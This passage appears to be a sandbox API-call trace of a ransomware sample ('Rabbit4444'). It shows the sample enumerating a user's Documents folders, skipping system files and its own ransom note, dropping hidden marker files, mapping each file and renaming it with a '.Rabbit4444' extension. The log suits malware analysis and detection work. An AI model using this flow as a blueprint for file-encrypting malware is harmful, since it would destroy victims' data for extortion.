ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0049.816] lstrcmpiW (lpString1="_private", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.816] lstrcmpiW (lpString1="_private", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="Rabbit4444.exe") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2=".") returned 1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="..") returned 1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="windows") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="bootmgr") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="pagefile.sys") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="boot") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="ids.txt") returned -1 [0049.817] lstrcmpiW (lpString1="_private", lpString2="NTUSER.DAT") returned -1 [0049.817] lstrcpyW (in: lpString1=0x130eb80, lpString2="_private" | out: lpString1="_private") returned="_private" [0049.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0049.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x5a) returned 0x11ca58 [0049.817] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6350 [0049.817] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0049.817] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0049.817] lstrcpyW (in: lpString1=0x130eb80, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.817] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.817] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.818] CloseHandle (hObject=0x278) returned 1 [0049.818] CloseHandle (hObject=0x27c) returned 1 [0049.818] GetCurrentThreadId () returned 0xd98 [0049.818] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0049.818] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" [0049.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ca58 | out: hHeap=0xe0000) returned 1 [0049.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0049.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private" [0049.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\" [0049.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3" [0049.818] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.819] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.822] FlushFileBuffers (hFile=0x27c) returned 1 [0049.823] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.823] CloseHandle (hObject=0x27c) returned 1 [0049.824] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private") returned 44 [0049.824] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.824] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe704974f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0049.824] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.824] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.824] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.824] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xd44481c9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe704974f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.824] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.824] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.824] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.824] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.824] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.824] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe704974f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe704974f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe704974f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.824] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.824] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.824] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="Rabbit4444.exe") returned -1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2=".") returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="..") returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="windows") returned -1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="bootmgr") returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="pagefile.sys") returned -1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="boot") returned 1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="ids.txt") returned -1 [0049.824] lstrcmpiW (lpString1="folder.ico", lpString2="NTUSER.DAT") returned -1 [0049.824] lstrcpyW (in: lpString1=0x130eb92, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0049.824] lstrlenW (lpString="folder.ico") returned 10 [0049.825] lstrlenW (lpString="Rabbit4444") returned 10 [0049.825] lstrcmpiW (lpString1="folder.ico", lpString2="Rabbit4444") returned -1 [0049.825] lstrlenW (lpString=".dll") returned 4 [0049.825] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0049.825] lstrlenW (lpString=".lnk") returned 4 [0049.825] lstrcmpiW (lpString1=".ico", lpString2=".lnk") returned -1 [0049.825] lstrlenW (lpString=".ini") returned 4 [0049.825] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0049.825] lstrlenW (lpString=".sys") returned 4 [0049.825] lstrcmpiW (lpString1=".ico", lpString2=".sys") returned -1 [0049.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.825] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.825] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14113573922) returned 1 [0049.825] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=29926) returned 1 [0049.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0049.825] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0049.825] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x77f0, lpName=0x0) returned 0x298 [0049.826] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x77f0) returned 0x70000 [0049.830] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.830] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.830] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.830] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.831] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14114163070) returned 1 [0049.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0049.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0049.831] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.831] CloseHandle (hObject=0x298) returned 1 [0049.831] CloseHandle (hObject=0x278) returned 1 [0049.831] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.Rabbit4444") returned 66 [0049.831] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\folder.ico.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\folder.ico.rabbit4444"), dwFlags=0x1) returned 1 [0049.832] InterlockedExchangeAdd (in: Addend=0xff618, Value=29936 | out: Addend=0xff618) returned 23593456 [0049.832] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3703 [0049.832] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0049.832] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0049.832] lstrcpyW (in: lpString1=0x130eb92, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.832] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\_private\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\_private\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.834] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.834] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.835] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.835] CloseHandle (hObject=0x278) returned 1 [0049.835] CloseHandle (hObject=0x27c) returned 1 [0049.835] GetCurrentThreadId () returned 0xd98 [0049.835] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0049.835] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\6XPv", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv") returned="C:\\Users\\FD1HVy\\Documents\\6XPv" [0049.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114f28 | out: hHeap=0xe0000) returned 1 [0049.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0049.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\6XPv" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv") returned="C:\\Users\\FD1HVy\\Documents\\6XPv" [0049.836] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\" [0049.836] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\.BFC0E91B00AE8A0620D3" [0049.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.837] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.839] FlushFileBuffers (hFile=0x27c) returned 1 [0049.840] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.840] CloseHandle (hObject=0x27c) returned 1 [0049.841] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\6XPv") returned 30 [0049.841] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.841] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82052b60, ftCreationTime.dwHighDateTime=0x1d4c876, ftLastAccessTime.dwLowDateTime=0x6dc61780, ftLastAccessTime.dwHighDateTime=0x1d4d2d6, ftLastWriteTime.dwLowDateTime=0xe70736fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0049.841] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.841] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.841] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.841] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x82052b60, ftCreationTime.dwHighDateTime=0x1d4c876, ftLastAccessTime.dwLowDateTime=0x6dc61780, ftLastAccessTime.dwHighDateTime=0x1d4d2d6, ftLastWriteTime.dwLowDateTime=0xe70736fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.841] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.841] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.841] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.841] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.841] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe70736fb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe70736fb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe70736fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.841] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.841] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.841] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8890f60, ftCreationTime.dwHighDateTime=0x1d4c971, ftLastAccessTime.dwLowDateTime=0xfb983b10, ftLastAccessTime.dwHighDateTime=0x1d4d5e2, ftLastWriteTime.dwLowDateTime=0xfb983b10, ftLastWriteTime.dwHighDateTime=0x1d4d5e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9FpAh6TVjmxPhP", cAlternateFileName="9FPAH6~1")) returned 1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="Rabbit4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2=".") returned 1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="..") returned 1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="windows") returned -1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="bootmgr") returned -1 [0049.841] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="pagefile.sys") returned -1 [0049.842] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="boot") returned -1 [0049.842] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="ids.txt") returned -1 [0049.842] lstrcmpiW (lpString1="9FpAh6TVjmxPhP", lpString2="NTUSER.DAT") returned -1 [0049.842] lstrcpyW (in: lpString1=0x130eb76, lpString2="9FpAh6TVjmxPhP" | out: lpString1="9FpAh6TVjmxPhP") returned="9FpAh6TVjmxPhP" [0049.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0049.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x5c) returned 0x11c5e0 [0049.842] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0049.842] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48c7eeb0, ftCreationTime.dwHighDateTime=0x1d4c62c, ftLastAccessTime.dwLowDateTime=0xfc3ca260, ftLastAccessTime.dwHighDateTime=0x1d4d045, ftLastWriteTime.dwLowDateTime=0xfc3ca260, ftLastWriteTime.dwHighDateTime=0x1d4d045, nFileSizeHigh=0x0, nFileSizeLow=0xf3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kq3J7tr.doc", cAlternateFileName="")) returned 1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="Rabbit4444.exe") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2=".") returned 1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="..") returned 1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="windows") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="bootmgr") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="pagefile.sys") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="boot") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="ids.txt") returned -1 [0049.842] lstrcmpiW (lpString1="_kq3J7tr.doc", lpString2="NTUSER.DAT") returned -1 [0049.842] lstrcpyW (in: lpString1=0x130eb76, lpString2="_kq3J7tr.doc" | out: lpString1="_kq3J7tr.doc") returned="_kq3J7tr.doc" [0049.842] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\_kq3J7tr.doc", dwFileAttributes=0x0) returned 1 [0049.842] lstrlenW (lpString="_kq3J7tr.doc") returned 12 [0049.842] lstrlenW (lpString="Rabbit4444") returned 10 [0049.842] lstrcmpiW (lpString1="q3J7tr.doc", lpString2="Rabbit4444") returned -1 [0049.842] lstrlenW (lpString=".dll") returned 4 [0049.842] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.842] lstrlenW (lpString=".lnk") returned 4 [0049.842] lstrcmpiW (lpString1=".doc", lpString2=".lnk") returned -1 [0049.842] lstrlenW (lpString=".ini") returned 4 [0049.842] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0049.843] lstrlenW (lpString=".sys") returned 4 [0049.843] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0049.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\_kq3J7tr.doc" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\_kq3j7tr.doc"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.843] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.843] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14115354960) returned 1 [0049.843] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62396) returned 1 [0049.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0049.843] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf6c0, lpName=0x0) returned 0x298 [0049.843] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf6c0) returned 0x70000 [0049.845] RtlAllocateHeap 